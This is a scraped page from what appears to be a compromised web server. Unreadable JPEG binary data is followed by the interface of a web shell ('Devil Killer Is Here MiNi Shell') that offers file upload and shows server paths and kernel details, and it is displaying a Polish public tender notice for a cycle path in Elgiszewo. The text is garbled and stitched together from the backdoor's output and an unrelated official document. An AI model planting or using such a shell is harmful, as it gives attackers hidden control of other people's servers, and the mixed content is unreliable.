JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230921/0040701101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa ścieżki rowerowej w miejscowości Elgiszewo - etap I” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ciechocin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciechocin 172</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciechocin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-408</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">5666837751</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ciechocin@ciechocin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ciechocin.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa ścieżki rowerowej w miejscowości Elgiszewo - etap I” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a90fd880-5850-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00407011</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00025390/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Budowa ścieżki rowerowej w miejscowości Elgiszewo - etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ciechocin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/ciechocin 2. Składanie dokumentów wpostępowaniu z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,WYŚLIJ WIADOMOŚĆ”<br/>dostępnego na stronie dotyczącej danego postępowania.3. Za datę złożenia dokumentów o których<br/>mowa w ust. 2, przyjmuje się kliknięcie przycisku ”WYŚLIJ WIADOMOŚĆ” po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. 4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych za pośrednictwem platformy zakupowej o której mowa w<br/>ust. 1, opisane zostały w Regulaminie platformazakupowa.pl oraz Instrukcji dla Wykonawców<br/>platformazakupowa.pl, dostępnych na stronie dotyczącej danego postępowania oraz stronie głównej<br/>Platformy pod adresem https://platformazakupowa.pl5. Występuje limit objętości plików lub<br/>spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB. 6. Sposób sporządzenia i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz.U. z 2020 poz. 2452)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy zakupowej dostępnej<br/>pod adresem https://platformazakupowa.pl/pn/ciechocin 2. Składanie dokumentów wpostępowaniu z<br/>wyjątkiem oferty, odbywa się elektronicznie za pośrednictwem formularza ,,WYŚLIJ WIADOMOŚĆ”<br/>dostępnego na stronie dotyczącej danego postępowania.3. Za datę złożenia dokumentów o których<br/>mowa w ust. 2, przyjmuje się kliknięcie przycisku ”WYŚLIJ WIADOMOŚĆ” po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. 4. Wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych za pośrednictwem platformy zakupowej o której mowa w<br/>ust. 1, opisane zostały w Regulaminie platformazakupowa.pl oraz Instrukcji dla Wykonawców<br/>platformazakupowa.pl, dostępnych na stronie dotyczącej danego postępowania oraz stronie głównej<br/>Platformy pod adresem https://platformazakupowa.pl5. Występuje limit objętości plików lub<br/>spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy<br/>maksymalnej wielkości 150 MB. 6. Sposób sporządzenia i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. (Dz.U. z 2020 poz. 2452)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KIR.271.1.10.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem inwestycji jest Budowa ścieżki rowerowej w miejscowości Elgiszewo - etap I w formule zaprojektuj i wybuduj. <br/>2.	Projektowanym w ramach niniejszego opracowania zadaniem inwestycyjnym jest budowa ścieżki rowerowej w m. Elgiszewo – etap I. Zadanie to realizowane jest przez Gminę Ciechocin na podstawie porozumienia nr ID-III.041.92.2022 z dnia 5 grudnia 2022 roku o współpracy i współdziałaniu przy realizacji zadania własnego Województwa Kujawsko-Pomorskiego. Zamawiającym dla projektowanego zadania jest Gmina Ciechocin a Inwestorem jest Zarząd Województwa Kujawsko-Pomorskiego reprezentowany przez Zarząd Dróg Wojewódzkich w Bydgoszczy.<br/>3.	Na każdym etapie należy uzgadniać wszystkie rozwiązania ( m in. Koncepcje, linie rozgraniczenia, projekt budowlany, wykonawczy itd.) z Inwestorem oraz należy wykonać budowę drogi dla rowerów zgodnie z Wytycznymi technicznymi do projektowani Zarządu Dróg Wojewódzkich.<br/>4.	Projektowanym w ramach niniejszego opracowania zadaniem inwestycyjnym jest budowa ścieżki rowerowej w m.Elgiszewo – etap I. Zadanie to realizowane jest przez Gminę Ciechocin na podstawie porozumienia nr ID-III.041.92.2022 z dnia 5 grudnia 2022 roku o współpracy i współdziałaniu przy realizacji zadania własnego Województwa Kujawsko-Pomorskiego. Zamawiającym dla projektowanego zadania jest Gmina Ciechocin a Inwestorem jest działający w imieniu Zarządu Województwa Kujawsko-Pomorskiego Zarząd Dróg Wojewódzkich w Bydgoszczy. Początek ścieżki zlokalizowany jest w km 7+910 drogi wojewódzkiej nr 569 Golub-Dobrzyń – Dobrzejewice, koniec zlokalizowany jest w km 10+499 tej drogi. Na całym odcinku projektuje się przebieg ścieżki po stronie prawej drogi. Początek projektowanego odcinka ścieżki zlokalizowany jest na wysokości wejścia/wjazdu na plaże nad Jez. Okonin. Na swoim przebiegu krzyżuje się ona z drogą gminną nr 110401C Granica Gminy (Kępa) – Okonin, z drogą powiatową nr 2108C Kowalewo Pomorskie – Okonin. Koniec projektowanego odcinka drogi zlokalizowany jest na skrzyżowaniu z drogą gminną nr 110402C Elgiszewo – Gierszówka – Granica Gminy (Gajewo). W stanie istniejącym w granicach pasa drogowego drogi wojewódzkiej nr 569 zlokalizowane są jezdnia o nawierzchni bitumicznej szerokości 4,9 – 6,5m, obustronne pobocza o nawierzchni gruntowej zmiennej szerokości. Lokalnie przy granicy pasa drogowego zlokalizowane są rowy przydrożne. Odprowadzanie wód opadowych i roztopowych z jezdni powierzchniowo do gruntu poprzez rowy przydrożne oraz poprzez teren przyległy do jezdni. W granicach pasa drogowego zlokalizowane są istniejące zjazdy obsługujące nieruchomości przyległe do pasa drogowego. Większość z nich nie posiada nawierzchni twardej. Szerokość zjazdów zmienna. Na całym objętym opracowaniem odcinku, droga nie posiada oświetlenia drogowego. W granicach pasa drogowego zlokalizowane jest zadrzewienie i zakrzaczenia wymagające usunięcia w części. W granicach pasa drogowego brak jest zlokalizowanych obiektów kubaturowych. Pod nawierzchnią drogi brak jest przepustów. W granicach pasa drogowego zlokalizowane są niżej wymienione sieci i urządzenia infrastruktury technicznej:<br/>-	sieć kablowa i napowietrzna elektroenergetyczna,<br/>-	sieć i przyłącza wodociągowe,<br/>-	sieci kanalizacji sanitarnej,<br/>-	napowietrzne i kablowe sieci telekomunikacyjne,<br/>Sieci te częściowo kolidują z projektowanym zagospodarowaniem. Bezpośrednio w granicach pasa drogowego drogi wojewódzkiej nr 569 występują tereny leśne, nieużytki, czynne kopalnie kruszyw naturalnych, zabudowa mieszkalna siedliskowa oraz usługowa. Projektowana ścieżka położona jest na Obszarze Chronionego Krajobrazu Doliny Drwęcy.<br/>5.	Wykonawca zaprojektuje i wybuduje ścieżkę rowerową zgodnie z przepisami prawa i zasadami<br/>wiedzy technicznej oraz odda do użytkowania wybudowany obiekt w stanie wolnym od wad i usterek. Realizacja objętego programem etapu podzielona jest na 2 odcinki. Odcinek I położony jest pomiędzy początkiem opracowania a skrzyżowaniem z drogą gminną nr 110401C, odcinek II położony jest pomiędzy skrzyżowaniem z drogą gminną nr 110401C a końcem odcinka objętego etapem I inwestycji. Na odcinku I Wykonawca zobowiązany będzie do zaprojektowania ścieżki i uzyskania stosownej decyzji zezwalającej na jej realizację. Na odcinku II Wykonawca zobowiązany będzie do realizacji zamierzenia w zakresie ustalonym dla odcinka I oraz do realizacji robót w pełnym zakresie. Zamawiający dopuszcza sporządzenie projektu i uzyskanie zezwolenia dla całości zadania, jednak sporządzona dokumentacja projektowana musi zawierać wyraźny rozdział na odcinki I i II. Realizacja przedmiotowego zadania odbywała będzie się na podstawie decyzji o zezwoleniu na realizację inwestycji drogowej wydawanej w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U. z 2023 r. poz. 162). Składa się z fazy projektowania oraz fazy realizacji i oddania do użytkowania. W fazie projektowania Zamawiający wymaga od Wykonawcy:<br/>6.	Wykonanie w systemie „zaprojektuj i wybuduj” dokumentacji projektowej wraz ze skutecznym złożeniem wniosku i uzyskaniem decyzji ZRID z rygorem natychmiastowej wykonalności, zgłoszeniem robót, wszelkich innych decyzji administracyjnych, uzgodnień i opinii niezbędnych dla zrealizowania zadania inwestycyjnego oraz raz robót budowlanych.<br/>7.	Wykonawca zaprojektuje i wybuduje ścieżkę rowerową zgodnie z przepisami prawa i zasadami wiedzy technicznej oraz odda do użytkowania wybudowany obiekt w stanie wolnym od wad i usterek. Realizacja przedmiotowego zadania odbywała będzie się na podstawie decyzji o zezwoleniu na realizację inwestycji drogowej wydawanej w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t.j. Dz. U. z 2023 r. poz. 162). Składa się z fazy projektowania oraz fazy realizacji i oddania do użytkowania. <br/>8.	W fazie projektowania Zamawiający wymaga od Wykonawcy:<br/>- pozyskania warunków realizacji zadania od zarządcy drogi oraz operatorów sieci infrastruktury technicznej, uzyskanie wymaganych prawem decyzji, opinii i uzgodnień umożliwiających realizację zamierzenia,<br/>- sporządzenia kompletnego projektu budowlanego w części dotyczącej projektu zagospodarowania terenu, projektów architektoniczno-budowlanych oraz załącznika do projektu budowlanego, stanowiących załącznik do wniosku o zezwolenie na realizację inwestycji drogowej,<br/>- sporządzenia projektów podziałów nieruchomości oraz pozyskanie wszelkich innych wymaganych załączników do wniosku o zezwolenie na realizację inwestycji drogowej,<br/>- przekazania wniosku o zezwolenie na realizację inwestycji drogowej wraz z kompletem wymaganych załączników zarządcy drogi – Zarządowi Dróg Wojewódzkich w Bydgoszczy,<br/>- czynnego uczestnictwa wraz z wnioskodawcą w prowadzonych przez organy administracji architektoniczno-budowlanej każdego stopnia postępowaniach administracyjnych,<br/>- sporządzenie projektów i uzyskanie wymaganych zatwierdzeń zmiany stałej organizacji ruchu oraz organizacji ruchu na czas prowadzenia robót budowlanych.<br/>9.	Faza realizacji i oddania do użytkowania rozpoczyna się wraz z uzyskaniem przez Inwestora ostatecznej lub z nadanym rygorem natychmiastowej wykonalności decyzji o zezwoleniu na realizację inwestycji drogowej. W fazie tej Zamawiający wymaga od Wykonawcy:<br/>- sporządzenia projektów technicznych,<br/>- sporządzenia i uzgodnienia z Zamawiającym i Inwestorem haromonogramu rzeczowo finansowego, głoszenia rozpoczęcia robót budowlanych,<br/>- realizacji robót w zakresie określonym w projekcie budowlanym,<br/>- uzyskanie pozwolenia na użytkowanie zrealizowanych obiektów,<br/>- przekazanie przyjętych do użytkowania obiektów Inwestorowi,<br/>Oferowana przez Oferenta cena wykonania zadania winna obejmować wszystkie koszty związane z przygotowaniem i realizacją zadania.<br/>10.	Początek projektowanej ścieżki zlokalizowany jest w km 7+910 a koniec w km 10+499 drogi wojewódzkiej nr 569. Przedmiotem niniejszego zamierzenia budowlanego jest ścieżka rowerowa wraz z niezbędną infrastrukturą (odwodnienie) o nawierzchni bitumicznej wykonanej z betonu asfaltowego AC8S szerokości 2,5 m. Nawierzchnia ścieżki obramowana obrzeżem betonowym 8x30 cm ustawianym na ławie z betonu. Pochylenie poprzeczne nawierzchni ścieżki 2,0%. Długość liniowa ścieżki wynosi 2,610 km. Prędkość projektowa 30 km/h. Projektowana ścieżka swoim zakresem winna obejmować przebudowę istniejących zjazdów i dojść do nieruchomości przyległych do pasa drogowego oraz dostęp do przystanku komunikacji zbiorowej w m. Elgiszewo. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45112730-1 - Roboty w zakresie kształtowania dróg i autostrad</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny i porównania ofert z zastosowaniem kryterium ceny następująco:<br/>a) Zamawiający, w oparciu o podane przez Wykonawcę w treści Formularza ofertowego oferowaną ceny za realizację przedmiotu<br/>zamówienia - 60 pkt<br/>b)Zamawiający dokona oceny i porównania ofert z zastosowaniem kryterium: Doświadczenie osób - 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W przedmiotowym postępowaniu o udzielenie zamówienia publicznego, Zamawiający ustanawia następujące warunki udziału w postępowaniu:<br/>1) warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie ustala minimalnych poziomów zdolności w tym zakresie.<br/><br/>2) warunek dotyczący zdolności technicznej lub zawodowej<br/>Zamawiający ustanawia następujące minimalne poziomy zdolności:<br/>a) w zakresie doświadczenia:<br/><br/>Zamawiający wymaga aby Wykonawca ubiegający się o udzielenie zamówienia wykazał, że wykonał minimum dwa zadania polegające na:<br/>- projektowaniu i budowie lub<br/>- projektowaniu i rozbudowie lub<br/>- projektowaniu i przebudowie lub<br/>- budowie lub<br/>- rozbudowie lub<br/>- przebudowie<br/>drogi (ulicy) i/lub ścieżki rowerowej i/lub drogi pieszo-rowerowej o nawierzchni bitumicznej o wartości co najmniej 2 500 000,00 mln zł brutto w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykaz robót budowlanych 